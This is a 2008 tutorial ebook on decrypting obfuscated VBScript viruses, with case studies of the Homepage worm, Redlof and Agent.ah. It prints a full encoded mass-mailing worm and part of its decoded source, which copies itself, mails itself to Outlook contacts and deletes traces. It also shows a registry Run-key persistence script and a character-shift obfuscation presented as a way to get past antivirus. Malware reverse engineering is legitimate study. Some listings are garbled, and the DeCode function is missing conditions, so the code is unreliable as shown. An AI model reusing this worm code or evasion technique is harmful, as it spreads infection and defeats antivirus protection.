Pro Decrypting VBScript Viruses

Pro Decrypting VBScript Viruses MARTANI Fakhrou
-1-
Copyright MARTANI © April 2008 | http://martani.net.googlepages.com | http://mtic.1fr1.net

-2- Pro Decrypting VBScript

Viruses
A step-by-step guide to decrypt VBScript viruses with fully supported source
code and tools.
By MARTANI FAKHROU
Copyright MARTANI eXpress © 2008
You can download the source code of the book from http://martani.net.googlepages.com

-3-
To Fakhrou!

Contents
About the author …………………………………………………………………………… 5
Introduction…………………………………………………………………………………. 5
An Overview Of This Book………………………………………………………………… 6
Who Should Read This Book…………………………………………………………….. 7

-4- Obtaining This Book‘s Source Code…………………………………………………….. 7
How To Reach Me…………………………………………………………………………. 7
Disclaimer………………………………………………………………………….………. 7
How To Use This Book…………………………………………………………………… 8
WSH Encoding…………………………………………………………………………….. 9
From VBScript WMI and ADSI unleashed……………………………………………… 9
 Chapter 1: Basic Decryption Techniques

o Why encryption……………………………………………………………. 10
o Email-Worm.VBS.Homepage case study………………………………. 13
o Virus.VBS.Redlof.l case study…………………………………………… 17
o A Windows Script Encoder sample virus | Virus.VBS.Redlof.n case
study………………………………………………………………………… 20
o Summary…………………………………………...………………………. 25
 Chapter 2 : A real decryption process

o Analyzing the Virus.VBS.Agent.ah.vbs code………………………….. 26
 First look to the virus code……………………………………….. 26
 finding the entry point of the code………………………….…… 27
 analyzing the first executed function…………………………… 29
 Decrypting the first executed function……………………….…. 29
o Decrypting the Virus.VBS.Agent.ah source code………………..……. 36
 the problem with the decrypted function………………….……. 39
 the final source code……………………………………………... 44
o Summary…………………………………………………………………… 45
o What‘s next………………………………………………………………… 46

About The Author

MARTANI Fakhrou has been developing si nce he was 12 years old; he has firsthand
developer experience with a variety of languages, including Visual Basic, C#. He is
interesting in .NET framework and its related technologies like ADO.net, XML.Net,
ASP.net, Web Services, Silverlight and WPF, in his free time you can find him
reading books about programming, physics and philosophy, or viewing his favorite
TV shows.
-5-
Introduction
“Viruses don’t harm, ignorance does. Is ignorance a defense?”
herm1t
“[...] I am convinced that computer viruses are not evil and that
programmers have a right to create them, to possess them and to
experiment with them . . . truth seekers and wise men have been per-
secuted by powerful idiots in every age . . . ´ ’
Mark A. Ludwig
The purpose of this book is to propose a teaching approach to understand how
viruses are encrypted (encoded – we use the two words interchangeably), and how
to reverse-engineering the process of encrypting, it also introduced some techniques
you can use in any program most importantly Scripts like in Perl, VBScript,
JavaScript or web frameworks like ASP.
The first look at an encrypted virus might be not easy, but knowing what‘s going
inside really will give you the best vision about those viruses and how they works, in
fact the VBScript viruses decrypt them selves before they can be executed, so that
hackers must include the logic of decryption with their virus, and here comes the
weakest point in those viruses.
Some people say that VBScript is the paradise for virus writers, it has almost access
to everything in your system, change the registry, the security settings, SAM
accounts also, a total access to the WMI and ADSI and so more other tricks, so why
not use it to write malicious code? Another thing, Time has proven that Microsoft's
version of javascript, "JScript" is very insecure. JS/Seeker.B is an example of what
can be done with it.

Because scripts are not compiled programs, they are executed without any change in
the original text. This might be a problem for many reasons like: everyone that have a
read privileges to the file system can read the script, that may be a real problem to
administrators especially in a network system, also Antivirus programs can have a
signature of a virus by just analyzing the text inside it.
-6-
An Overview of This Book

In this book, you will learn how to decrypt a VBScript and find the original source
code; it will also teach you a number of techniques used by hackers to protect their
source code. That may be so effective for use with your own code or your secret
algorithms, which is very useful.
This book will not talk about the virus behavior or its VBScript specified functions right
now (another book will discuss the VBScript viruses behavior wait for it, you check
for other related books at http://martani.nry.googlepages.com), it is intended to
discuss the methods hackers take to obfuscate their source code so others can‘t
understand it. And AVs cannot just detect the threats so early.
I gave also some examples about some easy-to-understand viruses and other
algorithms I found on the web, so they can make a good base you can start from, I
also mention some ways of decrypting Encoded scripts by the WSD (Windows Script
Decoder), but I don‘t provide any tools or real codes (you know Microsoft and the
Copyrights!!!!).
Also, this book supposes that you have a little knowledge about VBScript and
scripting in general. It will not teach you VBScript, if you wish learn VBScript those
books are so good to start: wrox vbscript programmer's reference or Sams
VBScript WMI and ADSI Unleashed.
Another more thing: there is no Technical Reviewer or any help from others, I wrote
this book alone, if there are some errors you can understand the situation, also
English is not my language, so expect lots of grammatical mistakes, your help is
welcome about that of course.

Who Should Read This Book

You may think that this book is just for VB or VBScript programmers! In fact this book
is for anyone with some basic programming skills and whatever language or
framework you use, because it‘s just about decrypting a text file, and has no VBScript
specific stuff.
Despite the project am using here is designed in VB.Net, you are free to use any
programming language you want, you may even just follow without coding, because I
used a step-by-step process to show you the basics of decrypting.
-7-
Obtaining This Book’s Source Code
I have found that the best way to learn and retain a new skill is through hands-on
examples. For this reason, this book contains complete examples of source code.
When you are ready to execute the example code, you don‘t have to enter it yourself.
You can download all of the code presented in this book from my site at
http://martani.net.googlepages.com, visit also our forums for more support at
http://mtic.1fr1.net .
How To Reach Me
If you have questions or comments about this book or other decryption questions, I‘d
love to hear from you. Just send your e-mail to martani.net@live.fr. To make sure
your mail makes it past my spam filters you might want to include the text
Decrypting VBS virus somewhere in the subject line.
Disclaimer
This book is for demonstrative and educational purposes only. Use of this book and
the source code or the programs with it is at your own risk. The author cannot be held
responsible if any laws are broken by use of this book.
THIS BOOK AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF ANY
KIND, EITHER EXPRESSED OR IMPLIED, BUT NOT LIMITED TO THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A PARTICULAR
PURPOSE.
If you use or distribute information or source code in this book, you should associate the
book‘s title, website and the author name. Also, any program based upon this books‘
information should display the copyright message and the disclaimer.
Copyright 2008. All Rights Reserved MARTANI ©.
martani.net@live.fr | http://mtic.1fr1.net | http://martani.net.googlepages.com

How To Use This Book

As I mentioned before, I used a step-by-step process in this book, so you can find the
associated code it in the attached project, you just run the project and choose the
step you want and you will get immediately the source code I used in decrypting and
the result of the part you are reading.
The following is the flag you find when you are in the step 1 of the decrypting vbs
virus project for example:
-8-
Project: decrypting vbs virus _ Step 1
The chapters of this book are not related, so you can start by anyone you want, but I
strongly suggest that you start from the beginning.
The associated viruses are stored as plain text files and so will not cause any
problems when viewed using notepad or any other text editor. However, since most
of these are actual unmodified viruses, your virus scanner will complain. If you leave
them as TXT (text) files, they will not cause any problems.
You can download the source code and other support tools from my web site:
http://martani.net.googlepages.com
For more tutorials and supports about technologies and programming visit our forums
at: http://mtic.1fr1.net
Or e-mail me at: martani.net@live.fr

WSH encoding
In this tutorial, we will deal with script-based viruses, and exactly VBScript viruses. If
you have already get your hands dirty with VBScript scripts you will notice that there
are many methods for encrypting a script (a virus or not, whatever), Microsoft offer a
script tool to use with scripts, the Windows Script Encoder, the encoder can take a
script and make it like that:
//**Start
Encode**#@~ ^QwIAAA==@#@&0;mDkWP7nDb0z ZK D.n1YAMGhk+Dvb`@#@&P,kWÙC7kLlDG
-9-
Dcl22gl:n~{‗~Jtr1DGkW6YP&xDnD+OPA62sK D+ME#@#@&P,~~k6P vxC\ rLmYGDcCwa.n.k
kWUbx[+X66Pcr*c J#,@*{~ !*P~P,P~. YEMU`DDE bIP,P,+s/n@#@&P~P,~PM+O;Mx`WC^
/n#pN6E U1YbWx,o Obaw.WaDrCD+nmL+ v#@#@&~P7lMP dY.q,‘~J_CN,Y4rkP4nnPCx,C1Y
;mV, +(PkrY ~~l,wCL PmKhwmYk(snPSkDt~JI@#@&P~\m.PkY.+,‘PE8MWA/ .kPGDt D
PDtmUPri@#@&,P-CMP/ D.&,‘Pr\rmMWkWWY~
After encrypting a script, a .vbe or .je extension file name will be produced, The
different filename extension tells Windows Script Host (WSH) that it needs to decode
the script before executing it; if you change the filename extension to .vbs (or .js), you
receive a runtime error when executing the script, but changing a .vbs file to .vbe
doesn‘t affects anything.
Encrypted scripts can stop only a casual user, in fact a web search for ―Windows
Script Decoder‖ will turn up several free tools designed to quickly decode an encoded
script. And of course anyone with a little time on their hands and some techniques in
programming can decode the encoded script.
From VBScript WMI and ADSI unleashed

―Why can scripting be dangerous?‖ isn‘t a question many administrators have to ask.
A noticeable percentage of all new viruses, according to some authorities, are script
based; certainly some of the most devastating viruses, including Nimda, Melissa, and
others, propagate at least partially through scripts sent via email. Even internally
produced scripts can be dangerous, as scripts can delete users, create files, and
perform any number—in fact, an almost unlimited number—of tasks.

Basic encryption / decryption techniques Chapter I

Basic
In this chapter we will see some basic techniques about
encrypted viruses, we will take as an example two viruses
Decryption
which implement the basic algorithms of encryption and I will Techniques
show you how to decrypt them easily, besides if you practiced
1. Why encryption?
decoding before you may realize that the algorithms are so
simple. You can directly move ahead to the next chapter but I 1.a. Email-
- 10 - strongly suggest that you read this chapter. You have to know Worm.VBS.Homepage
also that those two viruses are so old that‘s why they are too
case study
simple like that.
1.b. Virus.VBS.Redlof.l
Well, after that case study of the two viruses we will see also a case study
virus which is encrypted with the Windows Script Encoder, and 1.c. A Windows Script
try to spot out the differences between encrypted scripts by Encoder sample virus |
hackers and Encrypted scripts from the Windows Script Virus.VBS.Redlof.n case
Encoder. study
Summary
Why encryption
Some people may ask why encrypting a virus if it still does the
same thing even not encrypted, and what can encryption do
really for a virus (or a script in general).
Well there are few reasons for that and the best of them is:
obfuscation! Yes obfuscation. Let‘s say you are a network
administrator and you want to run a simple script every time a
user logged on, and to do that you have to run an application at
startup. We know that the best way to do that is playing around
the windows registry, exactly in the following key
HKLM\Software\Microsoft\Windows\CurrentVersion\Run\.
That‘s so easy I guess, every programming language has its
API‘s to manage the registry but one of the easiest ways to do
that is with VBScript (the easiest I believe).
Well, lets be that network administrator! Fire up notepad, or

whatever text editor you want and type those lines:

Dim Startup
Set Startup = CreateObject("WScript.Shell")

Startup.RegWrite "HKLM\Software\Microsoft\Windows\CurrentVersion\Run\", & _
"MyScript.vbs"
Save that file as script.vbs, and if you have a good up to date antivirus it will block it
right away. When I tried to save it my antivirus (Kaspersky 7) alert me that following
threat découvert : virus Type_Script (modification). As we all know this script is
for administrating purposes and we strongly need to perform that task, so as a
solution we may change the script text to something not understood by the AV (or the
- 11 - users we try to manage).
So let‘s try to change some thing in our previous script, the idea is to iterate through
all the script characters and change everyone by the character with the next ASCII
code, means that a  b, A  B and so on… doing that is too simple and here is the
script:
msgbox(encode("Dim Startup:Set Startup =
CreateObject(""WScript.Shell""):Startup.RegWrite
""HKLM\Software\Microsoft\Windows\CurrentVersion\Run\"", ""MyVirus.vbs"""))
Function encode(s)
For i = 1 To len(s)
t = mid(s, i, 1)
t = chr(asc(t) + 1)
coded = coded + t
Next
encode = coded
End Function
This script is straightforward, there is a function called encode with an s parameter, it

iterates through the characters of the s variable and replaces everyone by its
successor in the ASCII code. Then the resulting string is displayed with the msgbox
procedure.
You can save that script with a .vbs extension file, running that script gives us the
following result:
That resulting text is in fact the script we wrote previously which was detected by the
AV as a threat, now the next step is to include this text in our script and include also
the function that decode that text, and that way we can run our script normally.

The function that decode the encoded text we had is straightforward, it‘s just
reversing the one that encode the script, as you remember we replaced each
characters by its successor in the ASCII code, so now we have just to replace each
character by its predecessor.
Ok now its time to try it out, this is the script:
msgbox(decode("Ejn!Tubsuvq;Tfu!Tubsuvq!>!DsfbufPckfdu)#XTdsjqu/Tifmm#*;Tubs
uvq/SfhXsjuf!#ILMN]Tpguxbsf]Njdsptpgu]Xjoepxt]DvssfouWfstjpo]Svo]#-
!#NzWjsvt/wct#"))
Function decode(s)
- 12 - For i = 1 To Len(s)
t = Mid(s, i, 1)
t = Chr(Asc(t) - 1)
coded = coded + t
Next
decode = coded
End Function
Saving it as a .vbs file and running it gives that following result:
Do you realize that? The following encoded text from the previous script
("Ejn!Tubsuvq; Tfu!Tubsuvq!>!DsfbufPckfdu)#XTdsjqu/Tifmm#*; Tubsuvq/SfhXsjuf!#ILMN] Tpguxbs f]Njd
sptpgu] Xjoepxt]DvssfouWfstjpo]S vo]#-!#NzWjsvt/wct#")
Gives us the previous figure! Although the virus is still detectable by the AVs but, you
just saw a simple encryption process that encrypt a script to obfuscate if, so people
can‘t realize what‘s inside and with more hard work you can also play around
antivirus programs. (Don‘t think we just made a virus or a part of it, also if the AV still
detecting your script as a threat, that doesn‘t mean that this process is not working,
we just giving sample techniques here to show up the ways hackers use to obfuscate
their scripts, if you want your AV to wake up, change the msgbox with execute in the
previous script and see what will happen ).

1. a. Email-Worm.VBS.Homepage case study

As I mentioned in this chapter we will discuss simple techniques hackers use to
prevent casual users from looking to their viruses (scripts), and especially to make
them undetectable against Antivirus (which is the most important aim of encryption).
We will take as a case study the Email-Worm.VBS.Homepage virus, In fact it‘s an
old virus but it uses the same techniques found in the newest viruses. The encrypted
source code of the virus is attached with the joined source code in the 1st_Virus.txt
file.
- 13 - That way (encrypting the virus) the Antivirus can't just get a signature of the
encrypted text and look for it, in almost the cases those encryption techniques
changes and one virus can has more than one algorithm to encrypt itself.
The following section shows how to analyze an encrypted virus (in VBScript of
course) and play around the instruction it uses to decrypt it easily, you can do the
encryption by yourself, and you should take your time analyzing the virus again and
again to understand really how the encryption / decryption process works.
One of the most funny things you can also try is to make up the encrypting function
(the one that encrypt the source code), and you will see that you are able to make
your own techniques to obscure the code.
First look to the encrypted source code

The virus source code is straightforward, it‘s composed of two parts, an execute
statement in the first line, and a function called DeCode. The DeCode function has
one argument, a string argument called coded, that function returns a string also,
which is the decoded string, and that decoded string -which is in fact the virus source
code - will be executed after that by the execute statement.
If we take a closer look to the DeCode function we realize immediately that it iterates
through the characters of the encoded string and does some changes as following:
1. replaces the characters with the ASCII code 15, 16, 17 and 18 by the following
- 14 - ones : 10, 13, 32 and 9 respectively
2. every other character is replaced by the character that holds his ASCII code
minus two.
That‘s all, we have just to mention here that the execute statement executes the
string passed to it.
So if you want to just try this out start a new project, declare a variable x with the
encoded string in the virus source code 1st_virus.txt and just paste the DeCode
function in your project, the following is the full code of a VB.Net class that
demonstrates that (see next page).
Note that I make option strict and option implicit to off to behave closely to
VBScript (avoiding declaration and returning values of functions and most importantly
type casting).
You can find all that source code in the project named chapter1.sln, which is
associated with the book‘s source code.
TIP :
VBScript uses just one type for variables which is the Variant type, it then do casting on
the fly, if it need an integer it casts the variable to integer and so on… so don‘t worry
about the returning values of the functions or the variables type, VBScript handles all that!

Project: chapter 1 _ virus 1
1ST DECRYPTING TECHNIQUE.
Option Explicit Off

Option Strict Off
Public Class Form1

Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As
System.EventArgs) Handles MyBase.Load
Dim x As String =
- 15 - "Qp_Gttqt_Tguwog_Pgzv_ً gv_YU_?_EtgcvgQdlgev*$YUetkrv0Ujgnn$+_ً gv_HUQ?_Et
gcvgqdlgev*$uetkrvkpi0hkngu{uvgoqdlgev$+_ً qnfgt?HUQ0IgvUrgekcnHqnfgt*4+
_ً
'10ًgv_KpH?HUQ0QrgpVgzvHkng*YUetkrv0UetkrvHwnnpcog.3+_‫ے‬q_Yjkng_KpH0CvG
pfQhUvtgco>@Vtwg_ً etkrvDwhhgt?UetkrvDwhhgt(KpH0TgcfNkpg(xdetnh_ً qqr_ً'10ً
g
v_QwvH?HUQ0QrgpVgzvHkng*Hqnfgt($^jqogrcig0JVON0xdu$.4.vtwg+_ً wvH0ytkvg_
UetkrvDwhhgt_ً wvH0enqug_ًgv_HUQ?Pqvjkpi_ً'10ًh_YU0tgitgcf_*$JMEWûqhvyctg^
Cpôckngf$+_>@_$3$_vjgp_ً cknkv*+_ًpf_Kh_ً
'10ًgv_u?EtgcvgQdlgev*$Qwvnqqm0Cr
rnkecvkqp$+_ً gv_v?u0IgvPcogUrceg*$OCRK$+_ً gv_w?v0IgvFghcwnvHqnfgt*8+_ً qt_
k?3_vq_w0kvgou0eqwpv_ً h_w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$_Vjgp_ً 0Kvgou0
Kvgo*k+0enqug_ً 0Kvgou0Kvgo*k+0fgngvg_ً pf_Kh_ًgzv_ًgv_w?v0IgvFghcwnvHqnfgt*
5+_ً
qt_k?3_vq_w0kvgou0eqwpv_ً h_w0Kvgou0Kvgo*k+0uwdlgev?$Jqogrcig$_Vjgp_ً 0
Kvgou0Kvgo*k+0fgngvg_ً pf_Kh_ً
gzv_ً
'10ًcpfqok|g_ً?Kpv**6,Tpf+-
3+_ً
h_t?3_vjgp_ً U0Twp*$jvvr<11ovke03ht30pgv$+_ً nugkh_t?4_Vjgp_ًU0Twp*$jvvr
<11ovke03ht30pgv$+_ً nugkh_t?5_Vjgp_ًU0Twp*$jvvr<11ovke03ht30pgv$+_ً nugKh_
t?6_Vjgp_ًU0Twp*$jvvr<11ovke03ht30pgv$+_ً pf_Kh_ً
'10ًwpevkqp_Ocknkv*+_ًp_Gtt
qt_Tguwog_Pgzv_ً gv_Qwvnqqm_?_EtgcvgQdlgev*$Qwvnqqm0Crrnkecvkqp$+_ً h_Qwvn
qqm_?_$Qwvnqqm$_Vjgp_ً '12Ugv_Ocrk?Qwvnqqm0IgvPcogUrceg*$OCRK$+_ً '12Ugv_N
kuvu?Ocrk0CfftguuNkuvu_ً '12Hqt_Gcej_NkuvKpfgz_Kp_Nkuvu_ً '12_Kh_NkuvKpfgz
0CfftguuGpvtkgu0Eqwpv_>@_2_Vjgp_ً '12__EqpvcevEqwpv_?_NkuvKpfgz0CfftguuG
pvtkgu0Eqwpv_ً '12__Hqt_Eqwpv?_3_Vq_EqpvcevEqwpv_ً '12___Ugv_Ockn_?_Qwvnqq
m0EtgcvgKvgo*2+_ً '12___Ugv_Eqpvcev_?_NkuvKpfgz0CfftguuGpvtkgu*Eqwpv+_ً '1
2___Ockn0Vq_?_Eqpvcev0Cfftguu_ً '12___Ockn0Uwdlgev_?_$Jqogrcig$_ً '12___Oc
kn0Dqf{_?_xdetnh($Jk#$(xdetnh(xdetnh($[qw)xg_iqv_vq_ugg_vjku_rcig#_Kv)
u_tgcnn{_eqqn_=Q+$(xdetnh(xdetnh_ً '12___Ugv_Cvvcejogpv?Ockn0Cvvcejogpvu
_ً
'12___Cvvcejogpv0Cff_Hqnfgt_(_$^jqogrcig0JVON0xdu$_ً '12___Ockn0FgngvgC
hvgtUwdokv_?_Vtwg_ً '12___Kh_Ockn0Vq_>@_$$_Vjgp_ً '12___Ockn0Ugpf_ً
'12___YU
0tgiytkvg_$JMEWûqhvyctg^Cpôckngf$._$3$_ً '12__Gpf_Kh_ً'12__Pgzv_ً'12_Gpf
_Kh_ً'12Pgzv_ًpf_kh_ً
pf_Hwpevkqp"
Textbox1.text = DeCode(x)
End Sub
Function DeCode(ByVal Coded)
For I = 1 To Len(Coded)
CurChar = Mid(Coded, I, 1)
If Asc(CurChar) = 15 Then
CurChar = Chr(10)
ElseIf Asc(CurChar) = 16 Then
CurChar = Chr(13)
CurChar = Chr(32)
CurChar = Chr(9)
Else
CurChar = Chr(Asc(CurChar) - 2)
End If
DeCode = DeCode & CurChar
Next
End Function
End Class

Running that code will give us the fully supported VBScript source code, next is a
portion of that source code. You can find the full source code in
1st_Virus_Complete_Src.txt file.
A PORTION OF CODE FROM 1ST _VIRUS _C OMPLETE _SR C. TXT.
On Error Resume Next

Set WS = CreateObject("WScript.Shell")
Set FSO= Createobject("scripting.filesystemobject")
Folder=FSO.GetSpecialFolder(2)
Set InF=FSO.OpenTextFile(WScript.ScriptFullname,1)
- 16 - Do While InF.AtEndOfStream<>True
ScriptBuffer=ScriptBuffer&InF.ReadLine&vbcrlf
Loop
Set OutF=FSO.OpenTextFile(Folder&"\homepage.HTML.vbs",2,true)
OutF.write ScriptBuffer
OutF.close
Set FSO=Nothing
If WS.regread ("HKCU\software\An\mailed") <> "1" then

Mailit()
End If
Set s=CreateObject("Outlook.Application")
Set t=s.GetNameSpace("MAPI")
Set u=t.GetDefaultFolder(6)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).close
u.Items.Item(i).delete
End If
Next
Set u=t.GetDefaultFolder(3)
For i=1 to u.items.count
If u.Items.Item(i).subject="Homepage" Then
u.Items.Item(i).delete
End If
Next
Pretty cool and simple isn‘t it? Well if you think it‘s this simplicity I invite you to move
ahead to the next chapter (a newer virus with the same technique is waiting for
you). As I said before try to make out the encoding function, it‘s so easy also.

1. b. Virus.VBS.Redlof.l case study

In the previous section we saw how the Email-Worm.VBS.Homepage is encoded
and how easy it can be decoded.
Now we will see a more serious one that is more complicated than the one we saw
before (in fact it‘s not complicated at all, compared with the previous one we can say
that), you can find the encrypted source code in the file 2nd_Virus.txt.
- 17 - As you may guess that virus has the same architecture as the previous (this is really
about all VBScript viruses in fact), some encrypted variables that holds the source
code, and other functions to decode those variables, and of course the famous
execute statement to execute our code.
This is a sample screenshot of the encrypted virus:
By analyzing that code we spot the ExeString variable (line 7) that holds the
encrypted source code, and an execute statement in line 9 which actually decodes
the variable ExeString and finally another execute statement in line 18 which
executes the code inside the ThisText variable, as you may think the first execute
statement decodes the ExeString variables and puts the result in the ThisText
variable.
In the previous virus there was a function that decodes the source code, but here
there is no such a function, the key to understand how the decryption took place is to
clarify more the role of the execute statement.
The execute statement executes what ever in the string passed as a parameter to it,
that parameter is composed of a concatenation of multiple strings, we mention that
VbCrLf mean a new line such ―\n‖ in C style languages.

Over this book we will follow a simple process, we take whatever inside the
parentheses of the execute statement and affect it to the Text property of a TextBox
as follows (just a trick here we replace the "&vbCrLf&" substring by its equivalent):
Project: chapter 1 _ virus 2 a
Private Sub virus2a_Load(ByVal sender As Object, ByVal e As

System.EventArgs) Handles Me.Load
Dim x As String
x = "Dim KeyArr(3),ThisText""&vbCrLf&""KeyArr(0) =
- 18 - 7""&vbCrLf&""KeyArr(1) = 8""&vbCrLf&""KeyArr(2) =
3""&vbCrLf&""KeyArr(3) = 5""&vbCrLf&""For i=1 To
Len(ExeString)""&vbCrLf&""TempNum =
Asc(Mid(ExeString,i,1))""&vbCrLf&""If TempNum = 18
Then""&vbCrLf&""TempNum = 34""&vbCrLf&""End
If""&vbCrLf&""TempChar = Chr(TempNum + KeyArr(i Mod
4))""&vbCrLf&""If TempChar = Chr(28) Then""&vbCrLf&""TempChar =
vbCr""&vbCrLf&""ElseIf TempChar = Chr(29)
Then""&vbCrLf&""TempChar = vbLf""&vbCrLf&""End
If""&vbCrLf&""ThisText = ThisText & TempChar""&vbCrLf&""Next"
TextBox1.Text = Replace(x, """&vbCrLf&""", vbCrLf)
End Sub
That code gives us the following result:

Dim KeyArr(3), ThisText
KeyArr(0) = 7
KeyArr(1) = 8
KeyArr(2) = 3
KeyArr(3) = 5
For i=1 To Len(ExeString)
TempNum = Asc(Mid(ExeString,i,1))
If TempNum = 18 Then
TempNum = 34
End If
TempChar = Chr(TempNum + KeyArr(i Mod 4))
If TempChar = Chr(28) Then
TempChar = vbCr
ElseIf TempChar = Chr(29) Then
TempChar = vbLf
End If
ThisText = ThisText & TempChar
Next
That code‘s role is to decode (concatenate from multiple parts in fact) that ExeString
variable and puts the result in the ThisText variable, the code is straightforward also,
there‘s an array KeyArr() and a string variable ThisText. In fact it does the same
work as the previous virus, it iterates through the encoded string ExeString and
replace the characters with the code ASCII equal to 18 by the one of 34, then it
creates another variables which holds a byte (a character) TempChar having the
following value TempChar = (Chr(TempNum + KeyArr(i Mod 4))) and then if that
value is 28 ASCII code it will be replaced by the vbCr constant and if it is 29 it
replaced by vbLf constant. That‘s it the same as the first virus.

Notice some changes in this code from the first; despite that the principle is the same
but that code uses an executed instructions instead of a hard coded function, also it
shows some different behavior in decrypting the encrypted string, though it stills so
simple to understand how the code works.
Project: chapter 1 _ virus 2 b
Now we move to the decryption process of the encrypted string, we declare the
ExeString in our Load form event and paste the previous code also in the load event
- 19 - as follows (of course we associate to the ExeString variable its value from the virus
source code)
You find the complete decrypted source code of the virus in

2nd_Virus_Complete_Src.txt file

1.c. A Windows Script Encoder sample virus

Virus.VBS.Redlof.n case study.
One of the ways hackers uses to obscure their viruses‘ source code is using the
Windows Script Encoder tool, that tools is designed by Microsoft to protect scripts
from casual users, and it was a great tool for developers and system administrator.
As you guess hackers took their play and designed viruses encrypted by that tool.
- 20 - After some time, programmers start thinking about the algorithms used by the
Windows Script Encoder and realized some things, first the script runs everywhere, in
all computers that have WScript.exe or CScript.exe installed, and that‘s why it seems
that the algorithm used is static, so it do not changes, or uses some keys to be
decoded. Another thing that they realized is the presentation of the decoded script,
some characters do not changes after encoding, others changes to some
combination an so on.
In this book I will not discuss the algorithms used to encode the scripts and therefore
I wont also discuss the ones about decryption, am not sure yet about the copyrights
and some other stuff, anyway you can find a complete tutorial about those
techniques of encoding on my web site http://martani.net.googlepages.com, I also
include a decoding tools that you can download from my web site also.
Moving to our virus we will discuss the ways we deal with that type on encryption and
how to break it down to find the original source code, the virus is
Virus.VBS.Redlof.n, and a simple view of the encoded source code seems like
follows. You find it in 3rd_virus.txt file.
In line 1 we can see the <script> tag, and inside it we have

language=vbscript.encoded which means that the following script is encoded by
the Windows Script Encoder and it must be decoded before being executed,
another thing to mention here is that the <script> tag means that the virus is inside a
web page, and in the other case (a standalone file), the extension must be .vbe or .je
for Jscript.

After that we find the encoded script, and it have no VBScript specific statement, so
don‘t even try to search for the execute statement or another function, as I said
before I wont discuss the algorithms of decoding and encoding script with the
Windows Script Encoder (Microsoft Copyrights and so on, why? Ask Bill!!!!!!), I just
provide a tool called MARTANI_WSD (MARTANI_Windows Script Decoder), just
paste the encoded string, and you get right away the decoded script (even by
providing that tool I guess that am not respecting copyrights lol) .
MARTANI_WSD is developed under the .Net FrameWork 2 so you must install it first
to use the application, it‘s available for download from:
- 21 - http://martani.net.googlepages.com
And here is the decoded virus, 3rd_Virus_Complete_Src.txt:

VIRUS.VBS.REDLOF .N V IRUS
<script id=icaros language=vbscript.encode></script>

Summary
As we saw in this chapter, encryption / encoding play a big role in VBScript viruses
and in almost all viruses (especially scripting ones), the encryption process aim to
obfuscate the code so it can‘t be easily decoded or decrypted and hence the
Antivirus can't just get a signature of the encrypted virus and look for it, it has another
role which is not allowing others to play around the original source code and modify
it.
- 25 - This chapter also focused on the basic encryption techniques and the algorithms
used to encode the script and how to follow the decryption process to find the original
source code.

Chapter II:
2. A real decryption process
A real
The previous chapter discusses very basic and simple viruses decryption
that had been there for years, they use algorithms that are so
easy to follow and use them to reverse-engineering the
process
encryption process, in this chapter we have a more serious
virus with a so strong encryption algorithm (strong do not
2.1. Analyzing the
mean compared to encrypting algorithms but compared to code
- 26 - other encrypted viruses).
2.1.a. first look to the
Decrypting that virus is a real pleasure and you will see how virus code
funny it is, you can also use the associated project named
decrypting vbs virus to help you viewing the code in action 2.1.b. finding the entry
(it‘s a vb.net project and needs Visual Studio), you can change point of the code
the source code to play around the functions and so on… 2.1.c. analyzing the first
executed function
2.1.d. Decrypting the first

2.1. Analyzing the executed function
Virus.VBS.Agent.ah.vbs virus: 2.2. Decrypting
The virus that we are about decrypting has some behavior that the Virus.VBS.
we mention briefly here. It changes it self to a .vbe file and
copy itself in the Windows and Windows\System32 Agent.ah source
directories. code
2.2.a. the problem with
the decrypted function
2.1. a. First look to the virus code:
2.2.b. the final source
The virus that we are about to decrypt (decode we use code
interchangeably those words) is a set of VBScript instructions
that had been encrypted so it can‘t be read easily and Summary
detected by AVs (although it is). If you open the source code
of the virus (virus.txt), attached with the downloads from my
web site you will see something like that (next page):

LISETING 2.1: First look of the virus source code.
- 27 -
You find in the source codes which come with this book the complete source code of
the virus (encrypted and decrypted), the encrypted source code is in the file Virus.txt
(the extension is changed for security and to visualize the source code safety).
You can visualize the code in any text editor, we use NotePad here.
2.1. b. Finding the entry point of the code

Every application has an entry point or a statement that executes first, in VBScript or
any scripting language, the entry point is always the first stand-alone instruction (of
the language). Because scripting languages are interpreted languages, when
execute a script you just tell the script engine to run it line by line and execute the first
instruction it find.
So, knowing the entry point is simply finding the first statement in the virus code that
is VBScript specific instruction. Almost in the VBScript encrypted viruses the first
statement is always the execute statement, so our aim here is to find the
occurrences of the execute word in the code.
Doing a simple search in our code, we find three occurrences of the word execute,
so which one we choose? In fact we have to analyze every occurrence to see if it is a
stand alone instruction or not.
TIP :
A standalone instruction means that this instruction is not inside a string (not enclosed
within quotes ―‖) or inside a sub … end sub | function… end function blocs.
The following Listing shows the first and the second occurrences of the execute
statement in the code.

LISETING 2.2: First occurrence of the execute function in the virus source code.
- 28 -
For the first occurrence it‘s straightforward, we see that the execute word is enclosed
by two quotes so it‘s just a part of a string variable which means that it‘s not the
instruction that we are looking for.
For the second (the last line of the Listing 1.2), it seems so real, I mean it‘s not
enclosed by double quotes and it‘s followed by two brackets and an argument
passed to it (execute(y)). Well here we have to think more about how does this
statement will be executed, if we just turn back to the first line of the listing we find
the keyword function and just after it (the execute word) we find the end function
keyword, so as we said in the previous tip this execute statement will never fired up
till the host function (the uc function) is executed, that means simply it‘s not what we
are looking for.
Moving ahead to the third occurrence we find the following:
LISETING 2.3: Third occurrence of the execute function in the virus source code.
Well the third occurrence seems to be the one we are looking for, first it‘s between
the two ―:‖ marks (―:‖ mean break line in VB, it‘s like the ―;‖ in C++ and JAVA), and it‘s
a standalone function, so it‘s the entry point to our code.

2.1. c. Analyzing the first executed function

In the previous section we saw how to find the entry point of the code. Finding the
entry point of the code is defining the first thing the code does and hence the first
instruction running to make the virus fired up.
Its so simple, we have execute(uc(lO+qO)) so it‘s a function called uc that executes

first, we see also that it accept one parameter, in our case it‘s the sum of the two
variables lO and qO. Good job! We move ahead and search for the function uc,
- 29 - remember we are searching for a function and not an instruction or a string value, so
as you know that a function must be preceded by the keyword function and end by
the keyword end function.
Here are the results of searching the word uc:
LISETING 2.4: Third occurrence of the execute function in the virus source code.
We see that the uc word is preceded by the keyword function and in the last line we
find the end function keyword also, so we are in the right place. As you guess that
function is encrypted so we will try to decrypt it to see what‘s the next step of the
virus is.
2.1.c. Decrypting the first executed function

The first step in the decrypting process is to analyze deeply the code to find out the
